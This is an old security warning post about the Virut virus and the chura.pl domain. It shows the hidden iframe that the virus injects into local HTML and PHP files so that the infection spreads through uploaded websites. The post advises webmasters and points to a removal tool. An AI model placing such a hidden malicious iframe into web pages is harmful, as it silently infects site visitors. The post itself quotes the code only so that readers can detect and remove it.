Chura.pl Virut Virus Bothering Webmasters and Crashing Computers.
Is your antivirus showing some threats that is Blocked jl.chura.pl/jc/ . "jL.chura.pl/rc/ Exploit: JavaScript Obfuscation (type 604)" this is what AVG reports when you are accessing some website with the infected code embeded in it. Or it might be that your local files might have been modified.
In the virus infected computers the virus adds the following code just above the body tag in .htm, .html files( In all HTML, php files).
<iframe src="http://jL.chura.pl/rc/"
style="display:none"></iframe>
</BODY></HTML>
This is quiet annoying, it adds the above code to all the web-pages(.html, .php files ) on the local computer. The characters are provided with ascii code to prevent detection. When some webmaster edits his files and uploads this to his server, then the code sits on the website and infects all the people visiting the site.
Now it seems the site has been blocked. Some sites say it is of China origin and some say it is of Russia Origin. So all webmasters, check your file for this malicious code before uploading.
This site has affected many websites and resulted in crashing of computers accross the Globe. The virus that creates this mallicious code is Virut.
Virut a Real Big Virus
This site seems to be attached to a windows virus W32.Virut... Then your computer is under attack. If you are using an updated Antivirus, then it should be no problem. But this virus infects the RAM and makes things difficult. In many cases administrator gets disabled. The system gets crashed.
This virus is a polymorphic file infector with IRCBot functionality which infects .exe, .scr and script files (.PHP, .ASP, and .HTML), downloads more malicious files to your system, and opens a back door that compromises your computer. When Virut creates infected files, it also creates non-functional files that are corrupted beyond repair. In many cases the infected files cannot be disinfected properly by your anti-virus. When disinfection is attempted, the files become corrupted and the system may become irreparable. Even new softwares can't be installed. It means a total collapse and reinstalling your OS.
There is no guarantee the infection can be completely removed. In some instances an infection may have caused so much damage to your system that it cannot be completely cleaned or repaired. The malware may leave so many remnants behind that security tools cannot find them. Many experts in the security community believe that once infected with this type of malware, the best course of action is to wipe the drive clean, reformat and reinstall the OS.
AVG virus Removal Tool
AVG release a Virut removal tool for removing the virus. Please Click Here to download the remval tool. It scans the infectable files and removes them. If your memory is infected then it will scan the computer at boot time. This is last updated in August 2008 and there is no gaurentee that it will remove all
Click here to see what AVG has got to say about the virus and the removal tool.
More information will be soon added... please add comments below.. and please visit our forums to discuss about various virus threats Click Here